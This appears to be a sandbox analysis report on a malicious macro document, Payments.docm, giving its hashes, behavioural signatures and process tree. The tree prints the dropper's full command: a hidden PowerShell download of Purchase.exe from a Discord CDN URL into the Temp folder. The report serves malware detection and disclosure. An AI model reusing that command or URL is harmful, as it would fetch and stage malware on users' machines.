Analysis
- max time kernel: 149s
- max time network: 145s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 21-05-2022 04:15

Tasks
- Static task static1
- Behavioral task behavioral1: sample Payments.docm, resource win7-20220414-en
- Behavioral task behavioral2: sample Payments.docm, resource win10v2004-20220414-en
General
- Target: Payments.docm
- Size: 83KB
- MD5: 27cb67322a39cf49a0560f784df67969
- SHA1: 0750c70072f37062a1079f14a1e4da0f78a5fdfe
- SHA256: 37c52ac76731fec0a321cae8cd5cf91597de3c90aed254f28fbcb4764e617e23
- SHA512: 4260a95093659d0beaf40c63a6bfbee4d63b5ec4a69760130cacef4c441c1ebe591111ed964b0ae3d6b508052bde145a8d6893dc1f2eea624bc7bbdecd5a3968
Malware Config
- Extracted URL: http://cdn.discordapp.com/attachments/709738084001906749/709738177027637330/Purchase.exe
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: powershell.exe
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 4776 | 2316 | powershell.exe | WINWORD.EXE

Blocklisted process makes network request (2 IoCs)
Processes: powershell.exe
  flow | pid | process
  51 | 4776 | powershell.exe
  52 | 4776 | powershell.exe

Checks processor information in registry (2 TTPs, 9 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: EXCEL.EXE, WINWORD.EXE, EXCEL.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE

Enumerates system info in registry (2 TTPs, 9 IoCs)
Processes: WINWORD.EXE, EXCEL.EXE, EXCEL.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes: WINWORD.EXE
  pid | process
  2316 | WINWORD.EXE
  2316 | WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes: powershell.exe
  pid | process
  4776 | powershell.exe
  4776 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes: powershell.exe
  description | pid | process
  Token: SeDebugPrivilege | 4776 | powershell.exe

Suspicious use of FindShellTrayWindow (2 IoCs)
Processes: WINWORD.EXE
  pid | process
  2316 | WINWORD.EXE
  2316 | WINWORD.EXE

Suspicious use of SetWindowsHookEx (19 IoCs)
Processes: WINWORD.EXE, EXCEL.EXE, EXCEL.EXE
  pid | process
  2316 | WINWORD.EXE
  2316 | WINWORD.EXE
  2316 | WINWORD.EXE
  2316 | WINWORD.EXE
  4892 | EXCEL.EXE
  4892 | EXCEL.EXE
  4892 | EXCEL.EXE
  4892 | EXCEL.EXE
  5060 | EXCEL.EXE
  5060 | EXCEL.EXE
  5060 | EXCEL.EXE
  5060 | EXCEL.EXE
  2316 | WINWORD.EXE
  2316 | WINWORD.EXE
  2316 | WINWORD.EXE
  2316 | WINWORD.EXE
  2316 | WINWORD.EXE
  2316 | WINWORD.EXE
  2316 | WINWORD.EXE

Suspicious use of WriteProcessMemory (2 IoCs)
Processes: WINWORD.EXE
  description | pid | process | target process
  PID 2316 wrote to memory of 4776 | 2316 | WINWORD.EXE | powershell.exe
  PID 2316 wrote to memory of 4776 | 2316 | WINWORD.EXE | powershell.exe
Processes (tree; indentation shows parent/child depth)

- WINWORD.EXE (PID 2316)
  Path: C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Payments.docm" /o ""
  Signatures:
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  - powershell.exe (PID 4776, spawned by WINWORD.EXE)
    Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://cdn.discordapp.com/attachments/709738084001906749/709738177027637330/Purchase.exe',$env:Temp+'\Filename.exe')
    Signatures:
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

- EXCEL.EXE
  Path: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
  Signatures:
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious use of SetWindowsHookEx

- EXCEL.EXE
  Path: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
  Signatures:
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious use of SetWindowsHookEx
Downloads (files written during the run; path and size)
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE (471B)
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE (416B)
- C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1FD47DF7-23BC-4170-BBBC-3B4E81372E1B (145KB)
- C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml (303KB)
- C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db (4KB)
- C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal (48KB)